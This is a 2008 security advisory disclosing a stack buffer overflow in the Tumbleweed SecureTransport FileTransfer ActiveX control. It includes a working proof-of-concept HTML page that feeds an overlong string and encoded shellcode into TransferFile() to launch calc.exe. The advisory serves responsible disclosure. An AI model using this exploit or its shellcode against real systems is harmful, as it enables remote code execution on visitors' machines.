<<< Date Index >>>     <<< Thread Index >>>

Tumbleweed SecureTransport FileTransfer ActiveX Control Buffer Overflow



aushack.com - Vulnerability Advisory
-----------------------------------------------
Release Date:
 07-Apr-2008

Software:
 Tumbleweed Communications - SecureTransport FileTransfer
 http://www.tumbleweed.com/

Description:
 "Tumbleweed SecureTransport is the industry's most secure Managed File Transfer
  solution for moving financial transactions, critical business files, large
  documents, XML, and EDI transactions over the Internet and private
IP networks.
  The SecureTransport managed file transfer suite was built with
security in mind
  from the ground up. SecureTransport provides corporate and
government organizations
  with an enterprise-class managed file transfer service supporting a
broad and flexible
  set of open Internet standards. Winner of the 2006 "Best Intellectual Property
  Protection" award from SC Magazine, SecureTransport securely manages
file transfer
  at over 20,000 sites around the world.

  Financial networks use SecureTransport to move billions of dollars
in financial
  transactions daily, and 8 of the top 10 U.S. banks use it to serve
tens of thousands
  of corporate customers. Healthcare providers, payers, producers and
clearing houses
  are linked through SecureTransport, which provides a single,
integrated secure file
  transfer infrastructure for transferring private health information
(PHI). And
  government agencies leverage SecureTransport to share sensitive documents
  with other agencies."

Versions affected:
 SecureTransport FileTransfer ActiveX Control vcst_eu.dll 1.0.0.5 English.
 Prior versions, and other language editions (vcst_*.dll), are assumed
to be vulnerable.

Vulnerability discovered:

 Buffer Overflow.

Vulnerability impact:

 High - Remote code execution.

Vulnerability information:

 This vulnerability allows remote attackers to execute arbitrary code
on vulnerable
 installations of Tumbleweed Communications SecureTransport
FileTransfer ActiveX Control.
 User interaction is required to exploit this vulnerability in that
the target must visit a
 malicious page. It may be possible to embed into HTML capable email clients.

 The specific flaw exists within the ActiveX control:

 DLL: vcst_en.dll
 CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3

 interface IActiveXTransfer : IDispatch {
    [id(0x00000007), helpstring("method TransferFile")]
    HRESULT TransferFile(
                    [in] VARIANT URL,
                    [in] VARIANT hostName,
                    [in] VARIANT localFile,
                    [in] VARIANT remoteFile,
                    [in] VARIANT fdxCookie,
                    [in] long isSecure,
                    [in] long isUpload,
                    [in] int portNo,
                    [in] long isAscii,
                    [in] long shouldPerformMD5,
                    [in] long isCheckpointRestart,
                    [in] int serverPing,
                    [out, retval] VARIANT* errBuffer);
 };

 When a large value is specified for the 'remoteFile' parameter of the
 IActiveXTransfer.FileTransfer() method, a stack overflow occurs.
Exploitation can result
 in code execution under the context of the current user. Other
parameters, such as localFile,
 fdxCookie and localFile may also vulnerable.

 Examples:

 The following HTML will execute calc.exe under Windows 2000 Professional.

 <html>
 <object classid="CLSID:38681fbd-d4cc-4a59-a527-b3136db711d3"
id="Vulnerable"></object>
 <script language="javascript">
 Vulnerable.TransferFile("a", "b", "c",
"HqwToZjIhHkOZrLAyrUXkIEJkcQkiYRtePnECVUqpnlzkJTgBuGiqyLUCnceJkrsIxPXchpkjFjIgJRqGvniwwHJssGiTaPpmKZlBPwGMYhShxUWMCLuhgrpWXfdoWCCRYtDTrwyvDmfdAtdazeizBqexoCGifFzEKzvLENkrNCoqpQVtclDmpzPIJZTgUuSHWyiZoUWeNzrJFILdoEpKoyEptrZidLYuGbCrHxrMURRpdXyYJLzbeGRKqUOliWDHFdTEJOsGLngqOVVZdjzlCgOYbvSaUKcmQcugvmVQWMQVfudlFmPvrmULKPQDVGuVFxuhFbuazTlsGbYhuJIjKfPdzGdYKcGVmVFqrtRrzXIGrauMEauSvNfDQkfyQNOTNSwftDyRhKdBFyZHaKQDDrxIEoFyrNLjLPTTGTYNlkoWfPdgSqStnopGaGkwCujLqtocvbYJuTVbUJUJbsloqLClPXTklqPEOsthiraZgJzElMuXPuleJCQdcLsEbnalOGUpZsLgafPsjJEjUuIKAwjZWAaMLnVZwqMQeUYToFMBuneclybwZcKUjHMZhUaEayTKAqPlXGIcUbJVXOpiergIyJVEegVBsPObCFGjXBCgEYZYWfUKxzvVzWeJvhqDRksWeZTWBRhMctQqFMuRHxuTifCqZUsVbILkcJNPUnbnsQHvxdmXMQdpHYTCiDBSwJUxmhKHRbYISvVGvburwysfdxiBPsDiHJJpBYnQpWdBQBwTrikbgybejtrQlBScWNsdHUxsaJpbKeamEbyjgABESztoNphFXKFclPKGFfrDhBdQkPSxApusHVXwumGCVrfgNUDmOaGOAtHkoPzfDLAvtNaXPHWLaKCCUQAYdaAxALDrEcLZwGCXkOcgLVsSrJHAWMtpeAnplUkYhTizmWNyribnFjJAtCxHSJsjAAiPbMTsmAVCioiIdvUVzEWpVJDfHQKGUAmmYqGUCfTXPyhkjcSyhBHOddRPvqWugerPbMMQlSllqNPquoytLBtvWbRyzAJddSxtzQaLATtYgibQzPeaMQzKIdpEJHPWSZyAkyaGkQJxCjgcrwQkBygMCsddYUdHifpbYdPgASxsPDjaTsArCJqosrCvrwHDKkUKjSaoJtbTaiJreoGjDWfDafPjrStaCeUQCVwiyvafEIcsbSvlCavYTHKSnyraoIuUcsWPSpCVHbWEYtwobKFQwvUjoCZqdZEFoQzvosazdPVjXhYqdnDpPTSRapMmAuFXsixOKucVKZZKOBSnAPEzsBcWMGBnNRUVffkJSzESkzkgyKWHkQXIIVjWCeCqMXZtGtGRafPCRyQkZYjRpQOHisWHfdtOSyZHJapOYBLQpRMDyNrhnmFeZWWaWpcuMkfEnZPBbLJwCQloArgGKvsudOoLNFfJwaWZzvSUGKFaddKnMIpuWwXtLzGKmkCJrDZkohkHrbmZZVhFGLhAgLMbwNVPixPcBefTvfNJimVtYGXYPgHChbZLSgPwSYzlqCIpzOMBVSjGzgksrmKjAjlDRIhBBmELmUDMFSqHwWpxfEEWwjzObyFXZVGOMrrWqsWADbtweGtddyFNAIpqQqRzxmVUbjAbUxnDndqpKNDbWKpIHGAQuoGcufpEkjrbMecXBzSsKentBwSHkNDbPBkiZEvnQEKtFgIKCKDDBMsnxFLBKgyTYEIkZdLjxBpuWUHRmrAqeLZGrSYcHlmhEsDbctsVoimbXEJryOLpibDVzoGaxfuhjyDvcNWhvSfixmuJUlNWoeEJVpSVupoCcTCLteLmglsHXIWOUXEWZURFNjdmnaxJPAAPaKtbTQkqyjqbgLsEZtZUQTbqXCzkpnCeKGbBvjiXJgnAbHGbowIAVKXRgcJXtkZLRuClxmJtSPfeIWyOUvaUGnXBQFJfbKwofltQJYldfKXbShFcfwumMWSgIOmiTzGofVNEuGOnkFnnzjKLJVXwAkxonTCeINNwkIDgoVZmjfnflgvWUToyMkVSuGAQhzDLSoeGtKuPHoPynBsdrVqPJcNksGiJmZWYsMZWoRIWsBTBwaSfOQlBjzmwqrGXdDBEeKSuwSncGcwJyOnlCpOkXWcrBdfTncQfwLYfQPPWmlrLMPUZiOMcoxUmOSJbVzqbKlmgIjQcPABepTGFchsrdWijXbYxfLkIMxoTDRjfkRiytIvzFAfWuXfHrEVXoAuVZEDPqiTemWciTsSmKbwEtfMXkIVpDxKlFxRJHdaMdUrEZCJNkATqMnWcbAAEWPDNeWaPtGArUDpDPNkemRFZiEFLVqxaMdZnWFvFtUrXYWnPjWNMdTuzsMFxnmMEtwVQEcaZHzIWvGfaNHKTgKroefyErvhZqAavhGLJFdIzbjnVXkJlfFEeWmfoTRFIYNtfIvIbjZNSsGMzjvZMYvfGwQDzmDdCLHDEMdkYdCluEwIXBGugcOmrVhhTqhcJeWofypbnAvXsHNKwqDrWWWKYePeXkpInurLBiCAtqtVqiYOIzPUzNZcmEUyOaIWetBzEUpovdlaSXRFtJSHkXsLKglMsqETAcHvJZWcGEeelObuqCdWaYqPhfghqGfnYpErsUIVSZQbiRpJNdoeHLXEFeqXBoMpnZTaJZchqHpkdocMEvdOEnhOzzueuOTwXrwEATaDaWJpXZuLsCrYczknwyAphmUevgvZzQGOQzyrsPvIZZUGXqSwgRADPhvcfBMAGYmPGDDXPnEoOzABADlDQGicETRIAmcRwsSvszWELcaseVabXOmGuBhpfOjhALMypkyCgyBDpFEwbnGYSXFiNqbOqUypiJiTrOthTyspQvMQawnagaFJWzgoxKWQpoHXFxRUWRcmtLHFLPakRPDxNiGliWQqtRBjKHnBAagKkuMQLLVuDLevjbkEhqGFFYylybFEyMvdnMaRdcucYrpaSNGesjkOYWczjffbJmhEWTgeYGPDKRHBuOmauGzNNKCXhOAOqhxdHQAdfQEffPDBrvGiEodtTDIXeDdsOXcmMrdMJdxnbZFiuVRFNioshyrXTVodBxaFXYBbwfVwcUSJXGdZZAnYMEhVtPEZYUUBeRJDZKFCrRuJQdLtkKakwFLEQXTcOUcjFPolJLWtJvXenczUxRbGZRINYXWUzzcHJNryYMOCHNZsrfloSffZWtgLJXudLeRYwbukvxEMcMwXAYiXChqgVXDeXDMvfowmLZSwkHjTLtIRFnmGFArnVllqfjiOnXPdZjaIxugozJjVcoVZnExzQxhxPrciIeSjJMBImjHfsHyoigqknpsAoNGpGqRSEVegZQXQlVQyNmewfOjiZCwTWOdSRCwnzQczqnWyeXTIzzukwVKkDAsStGbrCwYYFQqnlBheQVFhGfgwKSCcQSqixNGSPeVobgJLiNftjLqycVBbSUphUqoxxstwQUdAVkQfyoKUAKWgEJycUHyHRPoVbnTTVHvrGnwzlPAvDsThykmjHmaWLblFsSPlHrsBJTvHWAmJViArtMgJZaTbPARfcnHAlorGubyovlnCfyQArosOILFrXKHupmHusRIoQgDZzyZHsCZhNoOnHWnUsUGFeqYsLILkSwnvHsuOlYGjhIfMhwqmcaIMQaqFFkhABUEXzKyKYSQyOTyrFfqIlIkNvLxriALuQsbamSphbypAADfqgXjxtFKzlXCuuCovaozBjtrqjyRqEJTLoLWXSJUzayhZYomKFzYBfKYzGodrrIXemRZZRwDXyfCLVxmmdLOvwSCTjtsETodToQLvjrUkHUQktaQZvODJrtRgmEuFYDvPIcmynnHzAVroXUfFIvUszIyeJVaWogcLPDKuLTPmCWZEOWpyQeDUjhiyZHtjMEBnGYjYpnFeiAlaqfziytMiSAUmXpKzJEdIPWNdMKsjilgDITudqqCoHrsQDGUBIbxtHCJRzPIQuthMmhiaJSvncBzVNuDDIJFXvySSKUOlkFdEbbvvQYMRoFgGurkUAWbiczranFEsZzPYlUJKsAeFJOXPVmthxTdmgQWCzscNuhCNfRnOZFXwUOdGmHGhBijSrytzjNJiwDyNNlYmQbrjSSPvDgOdEGZNbKEkhyoboqmlzQUvEhrSrEAuKduQGvOyrVgCvrhmzXQjHsoQrkRMIgFNhqvMncLHcauYYPVcZNescGfqSPeFODxhzUkalkFRrMpnptBHYTZXVEgINvieNxFeJIVYRJaEsJOwDEkXaUxvuHQgUSjyVxoXfxjzNTXehTukeQAosgTtbaTswUhSSxGmytLAxAUYmLpcNOWqvHWgiJhfduWtwALnUZoiGZIlKhbnHZmGLWjfgMDLbNJKNJAJufWHQDDdBNZsXXiFzgADlSniUqBjVQBNmCEDuciGDgnpNqXRGfdrPfMeFBsUHvwPYNfguoTgJoAUVCsfsXKXqbUOVaTbvWzaLFIiBodrzFvgzkejRwlBvdoDjvRUegEepepXqzHopUAAzvHgnacEwmXoZkmYmxKNJFoxekgijRWXRJteBBqwpPSrUVlSiHHPqBvipxhCaLQlumwzvoFnQNHKzYnAFWcjqfsLzjjbIEBzRyMvTVSdQSoYhHzOUXgUERmDofuFOqzngpykPjhMpQElnoUzqwzHë
!ÙÄ* 
uTXÝÄÙpô]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTEPC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJDMEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJGBCCQBLBCEPAA",
"d", false, false, 80, false, true, true, 420)
 </script>
 </html>

 Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.

References:
 aushack.com advisory
 http://www.aushack.com/200708-tumbleweed.txt

Credit:
 Patrick Webster ( patrick@xxxxxxxxxxx )

Disclosure timeline:
 13-Aug-2007 - Discovered during quick audit.
 14-Aug-2007 - Metasploit module developed.
 22-Aug-2007 - Notified vendor.
 19-Oct-2007 - Vendor patch released. SecureTransport Server 4.6.1 Hotfix 20.
 07-Apr-2008 - Disclosure.

EOF